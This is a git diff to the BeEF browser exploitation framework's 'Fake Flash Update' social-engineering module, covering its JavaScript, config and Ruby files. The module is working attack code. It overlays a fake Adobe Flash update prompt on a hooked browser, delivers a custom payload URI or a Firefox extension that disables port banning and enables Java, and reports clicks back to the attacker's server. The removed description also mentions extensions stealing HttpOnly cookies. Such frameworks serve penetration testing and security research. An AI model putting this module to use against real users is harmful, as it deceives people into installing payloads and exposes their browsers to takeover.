diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
old mode 100644
new mode 100755
index 0cc853ad6..c408886f1
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -6,37 +6,40 @@
beef.execute(function() {
- // Grab image and payload from config
- var image = "<%== @image %>";
- var payload_type = "<%== @payload %>";
- var payload_root = "<%== @payload_root %>";
- var chrome_store_uri = "<%== @chrome_store_uri %>";
- var firefox_extension = "/api/ipec/ff_extension";
- var payload = "";
+ // Module Configurations
+ var image = "<%== @image %>";
+ var payload_type = "<%== @payload %>";
+ var payload_uri = "<%== @payload_uri %>";
+ var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
+ var payload = "";
+
+ // Payload Configuration
switch (payload_type) {
- case "Chrome_Extension":
- payload = chrome_store_uri;
- break;
+ case "Custom_Payload":
+ payload = payload_uri;
+ break;
case "Firefox_Extension":
- payload = payload_root + firefox_extension;
+ payload = beef_root + "/api/ipec/ff_extension";
break;
default:
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.');
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
break;
}
- // Add div to page
- var div = document.createElement('div');
- div.setAttribute('id', 'splash');
- div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
- div.setAttribute('align', 'center');
- document.body.appendChild(div);
+ // Create DIV
+ var fakediv = document.createElement('div');
+ fakediv.setAttribute('id', 'fakeDiv');
+ fakediv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');
+ fakediv.setAttribute('align', 'center');
+ document.body.appendChild(fakediv);
+
// window.open is very useful when using data URI vectors and the IFrame/Object tag
// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
- div.innerHTML= "![](\"")
";
+ fakediv.innerHTML = "";
+
$j("#splash").click(function () {
$j(this).hide();
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked');
});
});
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
old mode 100644
new mode 100755
index 8922b69dc..36841d3f0
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
- description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.
A Chrome extension has privileged access and can do a whole lot.. - - Access all tabs and inject beef into all tabs
- - Use hooked browser as a proxy to do cross domain requests
- - Get all cookies including HTTPonly cookies
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.
The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
- authors: ["mh", "antisnatchor"]
+ description: "Prompts the user to install an update to Adobe Flash Player.
The delivered payload could be a custom file, a browser extension or any specific URI.
The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages.
See /extensions/ipec/files/LinkTargetFinder directory for the Firefox extension source code.
The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.
See /extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome."
+ authors: ["mh", "antisnatchor", "gcattani"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_flash_update/img/eng.png b/modules/social_engineering/fake_flash_update/img/eng.png
new file mode 100644
index 000000000..0251d83e5
Binary files /dev/null and b/modules/social_engineering/fake_flash_update/img/eng.png differ
diff --git a/modules/social_engineering/fake_flash_update/img/ita.png b/modules/social_engineering/fake_flash_update/img/ita.png
new file mode 100644
index 000000000..e3c773f60
Binary files /dev/null and b/modules/social_engineering/fake_flash_update/img/ita.png differ
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
old mode 100644
new mode 100755
index 25ed298f5..854249bb2
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -5,29 +5,38 @@
#
class Fake_flash_update < BeEF::Core::Command
+ def pre_send
+
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_flash_update/img/eng.png', '/adobe/flash_update', 'png')
+
+ end
+
def self.options
+
configuration = BeEF::Core::Configuration.instance
+
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
- payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
- image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+
+ image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/adobe/flash_update.png"
return [
- {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
- {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
- {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
- { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
- 'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
- 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
- }
+ {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Image', 'value' => image},
+ {'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
+ 'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'],['Firefox_Extension']],
+ 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload'},
+ {'name' =>'payload_uri', 'description' =>'Custom Payload URI', 'ui_label'=>'Custom Payload URI',
+ 'value' => "https://github.com/beefproject/beef/archive/master.zip"}
]
end
- #
- # This method is being called when a zombie sends some
- # data back to the framework.
- #
def post_execute
- save({'answer' => @datastore['answer']})
+
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png')
+
end
end